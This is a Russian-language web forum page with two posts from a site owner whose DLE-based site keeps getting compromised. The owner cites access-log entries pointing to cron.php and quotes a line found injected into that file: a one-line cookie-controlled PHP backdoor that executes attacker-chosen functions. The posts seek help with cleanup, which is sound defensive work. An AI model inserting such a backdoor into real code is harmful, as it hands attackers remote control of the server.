Перейти к публикации

GlooBus

новички
 Просмотреть профиль  Активность

  • Публикации

    2

  • Зарегистрирован

  • Посещение

 Тип публикации 

Сообщения, опубликованные пользователем GlooBus

    Что-то с cron.php

    в Прием багов

    Опубликовано:

    34 минуты назад, germanydletest сказал:

    так вы сравните код, с кодом из оригинального дистрибутива, может вам там вписали в него код для создания файла post.php

    в начале файла была следующая строка: 

    if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);

    в оригинале я ее не наблюдаю...

     

    Что-то с cron.php

    в Прием багов

    Опубликовано:

    Добрый день!

    Была еще давно куплена лицензия на 9.8 и установлен движок.

    Несколько месяцев назад, начал замечать появление левых файлов на хостинге (шеллы, спамботы и т.п.)

    Встроенным антивирусом и "Айболитом" вычистил все. Вчера опять пришло сообщение от хостера о рассылки спама с моего впс.

    Опять обнаружил в корне файл post.php от 13 марта 2016 г.

    Удалил, скачал access.log и начал смотреть, нашел такие интересные, подряд идущие строки: 

    216.227.215.146 - - [13/Mar/2016:20:25:36 +0300] "POST /post.php HTTP/1.0" 404 1414 "http://domain.ru/" "Mozilla/5.0 (Windows NT 6.1; en-GB; rv:1.9.1.20) Gecko/20100730 Firefox/3.8"
131.188.30.82 - - [13/Mar/2016:20:25:37 +0300] "POST /post.php HTTP/1.0" 404 1414 "http://domain.ru/" "Mozilla/5.0 (compatible; MSIE 11.0; Windows NT 6.0; Trident/4.1)"
173.254.28.22 - - [13/Mar/2016:20:25:39 +0300] "POST /post.php HTTP/1.0" 404 1414 "http://domain.ru/" "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.3; x64; Trident/5.1)"
78.47.120.170 - - [13/Mar/2016:20:25:39 +0300] "POST /post.php HTTP/1.0" 404 1414 "http://domain.ru/" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/5312 (KHTML, like Gecko) Chrome/15.0.813.0 Safari/5312"
208.112.43.174 - - [13/Mar/2016:20:25:40 +0300] "POST /post.php HTTP/1.0" 404 1414 "http://domain.ru/" "Mozilla/5.0 (Windows NT 6.3) AppleWebKit/5320 (KHTML, like Gecko) Chrome/15.0.840.0 Safari/5320"
216.70.92.88 - - [13/Mar/2016:20:25:41 +0300] "GET /dle-admin.php HTTP/1.0" 404 1414 "http://domain.ru/dle-admin.php" "Mozilla/5.0 (compatible; MSIE 11.0; Windows NT 6.0; WOW64; Trident/5.1)"
204.15.124.1 - - [13/Mar/2016:20:25:43 +0300] "GET /dle-admin.php HTTP/1.0" 404 1414 "http://domain.ru/dle-admin.php" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)"
64.22.124.14 - - [13/Mar/2016:20:25:44 +0300] "GET /dle-admin.php HTTP/1.0" 404 1414 "http://domain.ru/dle-admin.php" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/5330 (KHTML, like Gecko) Chrome/15.0.858.0 Safari/5330"
199.250.17.94 - - [13/Mar/2016:20:25:45 +0300] "GET /dle-admin.php HTTP/1.0" 404 1414 "http://domain.ru/dle-admin.php" "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.1)"
96.94.99.211 - - [13/Mar/2016:20:25:46 +0300] "GET /dle-admin.php HTTP/1.0" 404 1414 "http://domain.ru/dle-admin.php" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/5322 (KHTML, like Gecko) Chrome/14.0.841.0 Safari/5322"
72.249.15.85 - - [13/Mar/2016:20:25:48 +0300] "GET /cron.php HTTP/1.0" 200 21 "http://domain.ru/cron.php" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/5321 (KHTML, like Gecko) Chrome/14.0.810.0 Safari/5321"
72.249.15.85 - - [13/Mar/2016:20:25:50 +0300] "GET /cron.php HTTP/1.0" 200 16 "http://domain.ru/cron.php" "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.3; Trident/4.0)"
72.249.15.85 - - [13/Mar/2016:20:25:51 +0300] "POST /post.php HTTP/1.0" 200 32 "http://domain.ru/" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/5362 (KHTML, like Gecko) Chrome/15.0.844.0 Safari/5362"

    Тут видно, что с разных IP идет попытка обратиться к файлу post.php в корне сайта, неудачная (404). Далее такая же неудачная попытка обратиться к файлу админки. Потом к файлу cron.php и сразу через секунду, с того же IP который лез к cron.php, идет уже удачное обращение к файлу post.php.

     

    Тоесть, выходит так, что файл cron.php имеет какую то возможность положить файлик в корень сайта.

×
×
  • Создать...